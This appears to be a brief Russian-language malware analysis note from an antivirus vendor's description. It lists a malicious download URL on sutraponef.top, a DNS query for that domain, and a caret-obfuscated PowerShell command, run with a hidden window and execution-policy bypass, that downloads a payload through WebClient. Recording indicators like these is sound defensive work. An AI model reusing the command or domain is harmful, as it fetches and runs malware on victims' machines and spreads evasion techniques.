Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Powe^r^sHell.eXE ^-e^Xe^c^u^TI^o^nPo^L^Ic^Y bY^p^ASS -n^o^PRO^fiL^e^ -w^iNd^Ow^sTylE^ hIdD^E^N (New-OB^J^e^C^t SYs^Te^m^.^NE^T.W^e^B^Clie^Nt^).^do^W^n^L^oAD^f^ilE('http://sutr...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "Powe^r^sHell.eXE ^-e^Xe^c^u^TI^o^nPo^L^Ic^Y bY^p^ASS -n^o^PRO^fiL^e^ -w^iNd^Ow^sTylE^ hIdD^E^N (New-OB^J^e^C^t SYs^Te^m^.^NE^T.W^e^B^Clie^Nt^).^do^W^n^L^oAD^f^ilE('http://sutr...' (со скрытым окном)